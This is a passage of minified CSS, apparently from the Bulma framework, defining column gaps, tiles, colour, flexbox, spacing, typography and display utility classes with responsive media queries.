.columns.is-centered{justify-content:center}.columns.is-gapless{margin-left:0;margin-right:0;margin-top:0}.columns.is-gapless>.column{margin:0;padding:0!important}.columns.is-gapless:not(:last-child){margin-bottom:1.5rem}.columns.is-gapless:last-child{margin-bottom:0}.columns.is-mobile{display:flex}.columns.is-multiline{flex-wrap:wrap}.columns.is-vcentered{align-items:center}@media screen and (min-width: 769px),print{.columns:not(.is-desktop){display:flex}}@media screen and (min-width: 1024px){.columns.is-desktop{display:flex}}.columns.is-variable{--columnGap: .75rem;margin-left:calc(-1 * var(--columnGap));margin-right:calc(-1 * var(--columnGap))}.columns.is-variable>.column{padding-left:var(--columnGap);padding-right:var(--columnGap)}.columns.is-variable.is-0{--columnGap: 0rem}@media screen and (max-width: 768px){.columns.is-variable.is-0-mobile{--columnGap: 0rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-0-tablet{--columnGap: 0rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-0-tablet-only{--columnGap: 0rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-0-touch{--columnGap: 0rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-0-desktop{--columnGap: 0rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-0-desktop-only{--columnGap: 0rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-0-widescreen{--columnGap: 0rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-0-widescreen-only{--columnGap: 0rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-0-fullhd{--columnGap: 0rem}}.columns.is-variable.is-1{--columnGap: .25rem}@media screen and (max-width: 768px){.columns.is-variable.is-1-mobile{--columnGap: .25rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-1-tablet{--columnGap: .25rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-1-tablet-only{--columnGap: .25rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-1-touch{--columnGap: .25rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-1-desktop{--columnGap: .25rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-1-desktop-only{--columnGap: .25rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-1-widescreen{--columnGap: .25rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-1-widescreen-only{--columnGap: .25rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-1-fullhd{--columnGap: .25rem}}.columns.is-variable.is-2{--columnGap: .5rem}@media screen and (max-width: 768px){.columns.is-variable.is-2-mobile{--columnGap: .5rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-2-tablet{--columnGap: .5rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-2-tablet-only{--columnGap: .5rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-2-touch{--columnGap: .5rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-2-desktop{--columnGap: .5rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-2-desktop-only{--columnGap: .5rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-2-widescreen{--columnGap: .5rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-2-widescreen-only{--columnGap: .5rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-2-fullhd{--columnGap: .5rem}}.columns.is-variable.is-3{--columnGap: .75rem}@media screen and (max-width: 768px){.columns.is-variable.is-3-mobile{--columnGap: .75rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-3-tablet{--columnGap: .75rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-3-tablet-only{--columnGap: .75rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-3-touch{--columnGap: .75rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-3-desktop{--columnGap: .75rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-3-desktop-only{--columnGap: .75rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-3-widescreen{--columnGap: .75rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-3-widescreen-only{--columnGap: .75rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-3-fullhd{--columnGap: .75rem}}.columns.is-variable.is-4{--columnGap: 1rem}@media screen and (max-width: 768px){.columns.is-variable.is-4-mobile{--columnGap: 1rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-4-tablet{--columnGap: 1rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-4-tablet-only{--columnGap: 1rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-4-touch{--columnGap: 1rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-4-desktop{--columnGap: 1rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-4-desktop-only{--columnGap: 1rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-4-widescreen{--columnGap: 1rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-4-widescreen-only{--columnGap: 1rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-4-fullhd{--columnGap: 1rem}}.columns.is-variable.is-5{--columnGap: 1.25rem}@media screen and (max-width: 768px){.columns.is-variable.is-5-mobile{--columnGap: 1.25rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-5-tablet{--columnGap: 1.25rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-5-tablet-only{--columnGap: 1.25rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-5-touch{--columnGap: 1.25rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-5-desktop{--columnGap: 1.25rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-5-desktop-only{--columnGap: 1.25rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-5-widescreen{--columnGap: 1.25rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-5-widescreen-only{--columnGap: 1.25rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-5-fullhd{--columnGap: 1.25rem}}.columns.is-variable.is-6{--columnGap: 1.5rem}@media screen and (max-width: 768px){.columns.is-variable.is-6-mobile{--columnGap: 1.5rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-6-tablet{--columnGap: 1.5rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-6-tablet-only{--columnGap: 1.5rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-6-touch{--columnGap: 1.5rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-6-desktop{--columnGap: 1.5rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-6-desktop-only{--columnGap: 1.5rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-6-widescreen{--columnGap: 1.5rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-6-widescreen-only{--columnGap: 1.5rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-6-fullhd{--columnGap: 1.5rem}}.columns.is-variable.is-7{--columnGap: 1.75rem}@media screen and (max-width: 768px){.columns.is-variable.is-7-mobile{--columnGap: 1.75rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-7-tablet{--columnGap: 1.75rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-7-tablet-only{--columnGap: 1.75rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-7-touch{--columnGap: 1.75rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-7-desktop{--columnGap: 1.75rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-7-desktop-only{--columnGap: 1.75rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-7-widescreen{--columnGap: 1.75rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-7-widescreen-only{--columnGap: 1.75rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-7-fullhd{--columnGap: 1.75rem}}.columns.is-variable.is-8{--columnGap: 2rem}@media screen and (max-width: 768px){.columns.is-variable.is-8-mobile{--columnGap: 2rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-8-tablet{--columnGap: 2rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-8-tablet-only{--columnGap: 2rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-8-touch{--columnGap: 2rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-8-desktop{--columnGap: 2rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-8-desktop-only{--columnGap: 2rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-8-widescreen{--columnGap: 2rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-8-widescreen-only{--columnGap: 2rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-8-fullhd{--columnGap: 2rem}}.tile{align-items:stretch;display:block;flex-basis:0;flex-grow:1;flex-shrink:1;min-height:-webkit-min-content;min-height:-moz-min-content;min-height:min-content}.tile.is-ancestor{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.tile.is-ancestor:last-child{margin-bottom:-.75rem}.tile.is-ancestor:not(:last-child){margin-bottom:.75rem}.tile.is-child{margin:0!important}.tile.is-parent{padding:.75rem}.tile.is-vertical{flex-direction:column}.tile.is-vertical>.tile.is-child:not(:last-child){margin-bottom:1.5rem!important}@media screen and (min-width: 769px),print{.tile:not(.is-child){display:flex}.tile.is-1{flex:none;width:8.33333%}.tile.is-2{flex:none;width:16.66667%}.tile.is-3{flex:none;width:25%}.tile.is-4{flex:none;width:33.33333%}.tile.is-5{flex:none;width:41.66667%}.tile.is-6{flex:none;width:50%}.tile.is-7{flex:none;width:58.33333%}.tile.is-8{flex:none;width:66.66667%}.tile.is-9{flex:none;width:75%}.tile.is-10{flex:none;width:83.33333%}.tile.is-11{flex:none;width:91.66667%}.tile.is-12{flex:none;width:100%}}.has-text-white{color:#fff!important}a.has-text-white:hover,a.has-text-white:focus{color:#e6e6e6!important}.has-background-white{background-color:#fff!important}.has-text-black{color:#0a0a0a!important}a.has-text-black:hover,a.has-text-black:focus{color:#000!important}.has-background-black{background-color:#0a0a0a!important}.has-text-light{color:#f5f5f5!important}a.has-text-light:hover,a.has-text-light:focus{color:#dbdbdb!important}.has-background-light{background-color:#f5f5f5!important}.has-text-dark{color:#363636!important}a.has-text-dark:hover,a.has-text-dark:focus{color:#1c1c1c!important}.has-background-dark{background-color:#363636!important}.has-text-primary{color:#00d1b2!important}a.has-text-primary:hover,a.has-text-primary:focus{color:#009e86!important}.has-background-primary{background-color:#00d1b2!important}.has-text-primary-light{color:#ebfffc!important}a.has-text-primary-light:hover,a.has-text-primary-light:focus{color:#b8fff4!important}.has-background-primary-light{background-color:#ebfffc!important}.has-text-primary-dark{color:#00947e!important}a.has-text-primary-dark:hover,a.has-text-primary-dark:focus{color:#00c7a9!important}.has-background-primary-dark{background-color:#00947e!important}.has-text-link{color:#485fc7!important}a.has-text-link:hover,a.has-text-link:focus{color:#3449a8!important}.has-background-link{background-color:#485fc7!important}.has-text-link-light{color:#eff1fa!important}a.has-text-link-light:hover,a.has-text-link-light:focus{color:#c8cfee!important}.has-background-link-light{background-color:#eff1fa!important}.has-text-link-dark{color:#3850b7!important}a.has-text-link-dark:hover,a.has-text-link-dark:focus{color:#576dcb!important}.has-background-link-dark{background-color:#3850b7!important}.has-text-info{color:#3e8ed0!important}a.has-text-info:hover,a.has-text-info:focus{color:#2b74b1!important}.has-background-info{background-color:#3e8ed0!important}.has-text-info-light{color:#eff5fb!important}a.has-text-info-light:hover,a.has-text-info-light:focus{color:#c6ddf1!important}.has-background-info-light{background-color:#eff5fb!important}.has-text-info-dark{color:#296fa8!important}a.has-text-info-dark:hover,a.has-text-info-dark:focus{color:#368ace!important}.has-background-info-dark{background-color:#296fa8!important}.has-text-success{color:#48c78e!important}a.has-text-success:hover,a.has-text-success:focus{color:#34a873!important}.has-background-success{background-color:#48c78e!important}.has-text-success-light{color:#effaf5!important}a.has-text-success-light:hover,a.has-text-success-light:focus{color:#c8eedd!important}.has-background-success-light{background-color:#effaf5!important}.has-text-success-dark{color:#257953!important}a.has-text-success-dark:hover,a.has-text-success-dark:focus{color:#31a06e!important}.has-background-success-dark{background-color:#257953!important}.has-text-warning{color:#ffe08a!important}a.has-text-warning:hover,a.has-text-warning:focus{color:#ffd257!important}.has-background-warning{background-color:#ffe08a!important}.has-text-warning-light{color:#fffaeb!important}a.has-text-warning-light:hover,a.has-text-warning-light:focus{color:#ffecb8!important}.has-background-warning-light{background-color:#fffaeb!important}.has-text-warning-dark{color:#946c00!important}a.has-text-warning-dark:hover,a.has-text-warning-dark:focus{color:#c79200!important}.has-background-warning-dark{background-color:#946c00!important}.has-text-danger{color:#f14668!important}a.has-text-danger:hover,a.has-text-danger:focus{color:#ee1742!important}.has-background-danger{background-color:#f14668!important}.has-text-danger-light{color:#feecf0!important}a.has-text-danger-light:hover,a.has-text-danger-light:focus{color:#fabdc9!important}.has-background-danger-light{background-color:#feecf0!important}.has-text-danger-dark{color:#cc0f35!important}a.has-text-danger-dark:hover,a.has-text-danger-dark:focus{color:#ee2049!important}.has-background-danger-dark{background-color:#cc0f35!important}.has-text-black-bis{color:#121212!important}.has-background-black-bis{background-color:#121212!important}.has-text-black-ter{color:#242424!important}.has-background-black-ter{background-color:#242424!important}.has-text-grey-darker{color:#363636!important}.has-background-grey-darker{background-color:#363636!important}.has-text-grey-dark{color:#4a4a4a!important}.has-background-grey-dark{background-color:#4a4a4a!important}.has-text-grey{color:#7a7a7a!important}.has-background-grey{background-color:#7a7a7a!important}.has-text-grey-light{color:#b5b5b5!important}.has-background-grey-light{background-color:#b5b5b5!important}.has-text-grey-lighter{color:#dbdbdb!important}.has-background-grey-lighter{background-color:#dbdbdb!important}.has-text-white-ter{color:#f5f5f5!important}.has-background-white-ter{background-color:#f5f5f5!important}.has-text-white-bis{color:#fafafa!important}.has-background-white-bis{background-color:#fafafa!important}.is-flex-direction-row{flex-direction:row!important}.is-flex-direction-row-reverse{flex-direction:row-reverse!important}.is-flex-direction-column{flex-direction:column!important}.is-flex-direction-column-reverse{flex-direction:column-reverse!important}.is-flex-wrap-nowrap{flex-wrap:nowrap!important}.is-flex-wrap-wrap{flex-wrap:wrap!important}.is-flex-wrap-wrap-reverse{flex-wrap:wrap-reverse!important}.is-justify-content-flex-start{justify-content:flex-start!important}.is-justify-content-flex-end{justify-content:flex-end!important}.is-justify-content-center{justify-content:center!important}.is-justify-content-space-between{justify-content:space-between!important}.is-justify-content-space-around{justify-content:space-around!important}.is-justify-content-space-evenly{justify-content:space-evenly!important}.is-justify-content-start{justify-content:start!important}.is-justify-content-end{justify-content:end!important}.is-justify-content-left{justify-content:left!important}.is-justify-content-right{justify-content:right!important}.is-align-content-flex-start{align-content:flex-start!important}.is-align-content-flex-end{align-content:flex-end!important}.is-align-content-center{align-content:center!important}.is-align-content-space-between{align-content:space-between!important}.is-align-content-space-around{align-content:space-around!important}.is-align-content-space-evenly{align-content:space-evenly!important}.is-align-content-stretch{align-content:stretch!important}.is-align-content-start{align-content:start!important}.is-align-content-end{align-content:end!important}.is-align-content-baseline{align-content:baseline!important}.is-align-items-stretch{align-items:stretch!important}.is-align-items-flex-start{align-items:flex-start!important}.is-align-items-flex-end{align-items:flex-end!important}.is-align-items-center{align-items:center!important}.is-align-items-baseline{align-items:baseline!important}.is-align-items-start{align-items:start!important}.is-align-items-end{align-items:end!important}.is-align-items-self-start{align-items:self-start!important}.is-align-items-self-end{align-items:self-end!important}.is-align-self-auto{align-self:auto!important}.is-align-self-flex-start{align-self:flex-start!important}.is-align-self-flex-end{align-self:flex-end!important}.is-align-self-center{align-self:center!important}.is-align-self-baseline{align-self:baseline!important}.is-align-self-stretch{align-self:stretch!important}.is-flex-grow-0{flex-grow:0!important}.is-flex-grow-1{flex-grow:1!important}.is-flex-grow-2{flex-grow:2!important}.is-flex-grow-3{flex-grow:3!important}.is-flex-grow-4{flex-grow:4!important}.is-flex-grow-5{flex-grow:5!important}.is-flex-shrink-0{flex-shrink:0!important}.is-flex-shrink-1{flex-shrink:1!important}.is-flex-shrink-2{flex-shrink:2!important}.is-flex-shrink-3{flex-shrink:3!important}.is-flex-shrink-4{flex-shrink:4!important}.is-flex-shrink-5{flex-shrink:5!important}.is-clearfix:after{clear:both;content:" ";display:table}.is-pulled-left{float:left!important}.is-pulled-right{float:right!important}.is-radiusless{border-radius:0!important}.is-shadowless{box-shadow:none!important}.is-clickable{cursor:pointer!important;pointer-events:all!important}.is-clipped{overflow:hidden!important}.is-relative{position:relative!important}.is-marginless{margin:0!important}.is-paddingless{padding:0!important}.m-0{margin:0!important}.mt-0{margin-top:0!important}.mr-0{margin-right:0!important}.mb-0{margin-bottom:0!important}.ml-0{margin-left:0!important}.mx-0{margin-left:0!important;margin-right:0!important}.my-0{margin-top:0!important;margin-bottom:0!important}.m-1{margin:.25rem!important}.mt-1{margin-top:.25rem!important}.mr-1{margin-right:.25rem!important}.mb-1{margin-bottom:.25rem!important}.ml-1{margin-left:.25rem!important}.mx-1{margin-left:.25rem!important;margin-right:.25rem!important}.my-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.m-2{margin:.5rem!important}.mt-2{margin-top:.5rem!important}.mr-2{margin-right:.5rem!important}.mb-2{margin-bottom:.5rem!important}.ml-2{margin-left:.5rem!important}.mx-2{margin-left:.5rem!important;margin-right:.5rem!important}.my-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.m-3{margin:.75rem!important}.mt-3{margin-top:.75rem!important}.mr-3{margin-right:.75rem!important}.mb-3{margin-bottom:.75rem!important}.ml-3{margin-left:.75rem!important}.mx-3{margin-left:.75rem!important;margin-right:.75rem!important}.my-3{margin-top:.75rem!important;margin-bottom:.75rem!important}.m-4{margin:1rem!important}.mt-4{margin-top:1rem!important}.mr-4{margin-right:1rem!important}.mb-4{margin-bottom:1rem!important}.ml-4{margin-left:1rem!important}.mx-4{margin-left:1rem!important;margin-right:1rem!important}.my-4{margin-top:1rem!important;margin-bottom:1rem!important}.m-5{margin:1.5rem!important}.mt-5{margin-top:1.5rem!important}.mr-5{margin-right:1.5rem!important}.mb-5{margin-bottom:1.5rem!important}.ml-5{margin-left:1.5rem!important}.mx-5{margin-left:1.5rem!important;margin-right:1.5rem!important}.my-5{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.m-6{margin:3rem!important}.mt-6{margin-top:3rem!important}.mr-6{margin-right:3rem!important}.mb-6{margin-bottom:3rem!important}.ml-6{margin-left:3rem!important}.mx-6{margin-left:3rem!important;margin-right:3rem!important}.my-6{margin-top:3rem!important;margin-bottom:3rem!important}.m-auto{margin:auto!important}.mt-auto{margin-top:auto!important}.mr-auto{margin-right:auto!important}.mb-auto{margin-bottom:auto!important}.ml-auto{margin-left:auto!important}.mx-auto{margin-left:auto!important;margin-right:auto!important}.my-auto{margin-top:auto!important;margin-bottom:auto!important}.p-0{padding:0!important}.pt-0{padding-top:0!important}.pr-0{padding-right:0!important}.pb-0{padding-bottom:0!important}.pl-0{padding-left:0!important}.px-0{padding-left:0!important;padding-right:0!important}.py-0{padding-top:0!important;padding-bottom:0!important}.p-1{padding:.25rem!important}.pt-1{padding-top:.25rem!important}.pr-1{padding-right:.25rem!important}.pb-1{padding-bottom:.25rem!important}.pl-1{padding-left:.25rem!important}.px-1{padding-left:.25rem!important;padding-right:.25rem!important}.py-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.p-2{padding:.5rem!important}.pt-2{padding-top:.5rem!important}.pr-2{padding-right:.5rem!important}.pb-2{padding-bottom:.5rem!important}.pl-2{padding-left:.5rem!important}.px-2{padding-left:.5rem!important;padding-right:.5rem!important}.py-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.p-3{padding:.75rem!important}.pt-3{padding-top:.75rem!important}.pr-3{padding-right:.75rem!important}.pb-3{padding-bottom:.75rem!important}.pl-3{padding-left:.75rem!important}.px-3{padding-left:.75rem!important;padding-right:.75rem!important}.py-3{padding-top:.75rem!important;padding-bottom:.75rem!important}.p-4{padding:1rem!important}.pt-4{padding-top:1rem!important}.pr-4{padding-right:1rem!important}.pb-4{padding-bottom:1rem!important}.pl-4{padding-left:1rem!important}.px-4{padding-left:1rem!important;padding-right:1rem!important}.py-4{padding-top:1rem!important;padding-bottom:1rem!important}.p-5{padding:1.5rem!important}.pt-5{padding-top:1.5rem!important}.pr-5{padding-right:1.5rem!important}.pb-5{padding-bottom:1.5rem!important}.pl-5{padding-left:1.5rem!important}.px-5{padding-left:1.5rem!important;padding-right:1.5rem!important}.py-5{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.p-6{padding:3rem!important}.pt-6{padding-top:3rem!important}.pr-6{padding-right:3rem!important}.pb-6{padding-bottom:3rem!important}.pl-6{padding-left:3rem!important}.px-6{padding-left:3rem!important;padding-right:3rem!important}.py-6{padding-top:3rem!important;padding-bottom:3rem!important}.p-auto{padding:auto!important}.pt-auto{padding-top:auto!important}.pr-auto{padding-right:auto!important}.pb-auto{padding-bottom:auto!important}.pl-auto{padding-left:auto!important}.px-auto{padding-left:auto!important;padding-right:auto!important}.py-auto{padding-top:auto!important;padding-bottom:auto!important}.is-size-1{font-size:3rem!important}.is-size-2{font-size:2.5rem!important}.is-size-3{font-size:2rem!important}.is-size-4{font-size:1.5rem!important}.is-size-5{font-size:1.25rem!important}.is-size-6{font-size:1rem!important}.is-size-7{font-size:.75rem!important}@media screen and (max-width: 768px){.is-size-1-mobile{font-size:3rem!important}.is-size-2-mobile{font-size:2.5rem!important}.is-size-3-mobile{font-size:2rem!important}.is-size-4-mobile{font-size:1.5rem!important}.is-size-5-mobile{font-size:1.25rem!important}.is-size-6-mobile{font-size:1rem!important}.is-size-7-mobile{font-size:.75rem!important}}@media screen and (min-width: 769px),print{.is-size-1-tablet{font-size:3rem!important}.is-size-2-tablet{font-size:2.5rem!important}.is-size-3-tablet{font-size:2rem!important}.is-size-4-tablet{font-size:1.5rem!important}.is-size-5-tablet{font-size:1.25rem!important}.is-size-6-tablet{font-size:1rem!important}.is-size-7-tablet{font-size:.75rem!important}}@media screen and (max-width: 1023px){.is-size-1-touch{font-size:3rem!important}.is-size-2-touch{font-size:2.5rem!important}.is-size-3-touch{font-size:2rem!important}.is-size-4-touch{font-size:1.5rem!important}.is-size-5-touch{font-size:1.25rem!important}.is-size-6-touch{font-size:1rem!important}.is-size-7-touch{font-size:.75rem!important}}@media screen and (min-width: 1024px){.is-size-1-desktop{font-size:3rem!important}.is-size-2-desktop{font-size:2.5rem!important}.is-size-3-desktop{font-size:2rem!important}.is-size-4-desktop{font-size:1.5rem!important}.is-size-5-desktop{font-size:1.25rem!important}.is-size-6-desktop{font-size:1rem!important}.is-size-7-desktop{font-size:.75rem!important}}@media screen and (min-width: 1216px){.is-size-1-widescreen{font-size:3rem!important}.is-size-2-widescreen{font-size:2.5rem!important}.is-size-3-widescreen{font-size:2rem!important}.is-size-4-widescreen{font-size:1.5rem!important}.is-size-5-widescreen{font-size:1.25rem!important}.is-size-6-widescreen{font-size:1rem!important}.is-size-7-widescreen{font-size:.75rem!important}}@media screen and (min-width: 1408px){.is-size-1-fullhd{font-size:3rem!important}.is-size-2-fullhd{font-size:2.5rem!important}.is-size-3-fullhd{font-size:2rem!important}.is-size-4-fullhd{font-size:1.5rem!important}.is-size-5-fullhd{font-size:1.25rem!important}.is-size-6-fullhd{font-size:1rem!important}.is-size-7-fullhd{font-size:.75rem!important}}.has-text-centered{text-align:center!important}.has-text-justified{text-align:justify!important}.has-text-left{text-align:left!important}.has-text-right{text-align:right!important}@media screen and (max-width: 768px){.has-text-centered-mobile{text-align:center!important}}@media screen and (min-width: 769px),print{.has-text-centered-tablet{text-align:center!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-centered-tablet-only{text-align:center!important}}@media screen and (max-width: 1023px){.has-text-centered-touch{text-align:center!important}}@media screen and (min-width: 1024px){.has-text-centered-desktop{text-align:center!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-centered-desktop-only{text-align:center!important}}@media screen and (min-width: 1216px){.has-text-centered-widescreen{text-align:center!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-centered-widescreen-only{text-align:center!important}}@media screen and (min-width: 1408px){.has-text-centered-fullhd{text-align:center!important}}@media screen and (max-width: 768px){.has-text-justified-mobile{text-align:justify!important}}@media screen and (min-width: 769px),print{.has-text-justified-tablet{text-align:justify!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-justified-tablet-only{text-align:justify!important}}@media screen and (max-width: 1023px){.has-text-justified-touch{text-align:justify!important}}@media screen and (min-width: 1024px){.has-text-justified-desktop{text-align:justify!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-justified-desktop-only{text-align:justify!important}}@media screen and (min-width: 1216px){.has-text-justified-widescreen{text-align:justify!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-justified-widescreen-only{text-align:justify!important}}@media screen and (min-width: 1408px){.has-text-justified-fullhd{text-align:justify!important}}@media screen and (max-width: 768px){.has-text-left-mobile{text-align:left!important}}@media screen and (min-width: 769px),print{.has-text-left-tablet{text-align:left!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-left-tablet-only{text-align:left!important}}@media screen and (max-width: 1023px){.has-text-left-touch{text-align:left!important}}@media screen and (min-width: 1024px){.has-text-left-desktop{text-align:left!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-left-desktop-only{text-align:left!important}}@media screen and (min-width: 1216px){.has-text-left-widescreen{text-align:left!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-left-widescreen-only{text-align:left!important}}@media screen and (min-width: 1408px){.has-text-left-fullhd{text-align:left!important}}@media screen and (max-width: 768px){.has-text-right-mobile{text-align:right!important}}@media screen and (min-width: 769px),print{.has-text-right-tablet{text-align:right!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-right-tablet-only{text-align:right!important}}@media screen and (max-width: 1023px){.has-text-right-touch{text-align:right!important}}@media screen and (min-width: 1024px){.has-text-right-desktop{text-align:right!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-right-desktop-only{text-align:right!important}}@media screen and (min-width: 1216px){.has-text-right-widescreen{text-align:right!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-right-widescreen-only{text-align:right!important}}@media screen and (min-width: 1408px){.has-text-right-fullhd{text-align:right!important}}.is-capitalized{text-transform:capitalize!important}.is-lowercase{text-transform:lowercase!important}.is-uppercase{text-transform:uppercase!important}.is-italic{font-style:italic!important}.is-underlined{text-decoration:underline!important}.has-text-weight-light{font-weight:300!important}.has-text-weight-normal{font-weight:400!important}.has-text-weight-medium{font-weight:500!important}.has-text-weight-semibold{font-weight:600!important}.has-text-weight-bold{font-weight:700!important}.is-family-primary,.is-family-secondary,.is-family-sans-serif{font-family:BlinkMacSystemFont,-apple-system,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,Helvetica,Arial,sans-serif!important}.is-family-monospace,.is-family-code{font-family:monospace!important}.is-block{display:block!important}@media screen and (max-width: 768px){.is-block-mobile{display:block!important}}@media screen and (min-width: 769px),print{.is-block-tablet{display:block!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-block-tablet-only{display:block!important}}@media screen and (max-width: 1023px){.is-block-touch{display:block!important}}@media screen and (min-width: 1024px){.is-block-desktop{display:block!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-block-desktop-only{display:block!important}}@media screen and (min-width: 1216px){.is-block-widescreen{display:block!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-block-widescreen-only{display:block!important}}@media screen and (min-width: 1408px){.is-block-fullhd{display:block!important}}.is-flex{display:flex!important}@media screen and (max-width: 768px){.is-flex-mobile{display:flex!important}}@media screen and (min-width: 769px),print{.is-flex-tablet{display:flex!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-flex-tablet-only{display:flex!important}}@media screen and (max-width: 1023px){.is-flex-touch{display:flex!important}}@media screen and (min-width: 1024px){.is-flex-desktop{display:flex!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-flex-desktop-only{display:flex!important}}@media screen and (min-width: 1216px){.is-flex-widescreen{display:flex!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-flex-widescreen-only{display:flex!important}}@media screen and (min-width: 1408px){.is-flex-fullhd{display:flex!important}}.is-inline{display:inline!important}@media screen and (max-width: 768px){.is-inline-mobile{display:inline!important}}@media screen and (min-width: 769px),print{.is-inline-tablet{display:inline!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-inline-tablet-only{display:inline!important}}@media screen and (max-width: 1023px){.is-inline-touch{display:inline!important}}@media screen and (min-width: 1024px){.is-inline-desktop{display:inline!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-inline-desktop-only{display:inline!important}}@media screen and (min-width: 1216px){.is-inline-widescreen{display:inline!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-inline-widescreen-only{display:inline!important}}@media screen and (min-width: 1408px){.is-inline-fullhd{display:inline!important}}.is-inline-block{display:inline-block!important}@media screen and (max-width: 768px){.is-inline-block-mobile{display:inline-block!important}}@media screen and (min-width: 769px),print{.is-inline-block-tablet{display:inline-block!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-inline-block-tablet-only{display:inline-block!important}}@media screen and (max-width: 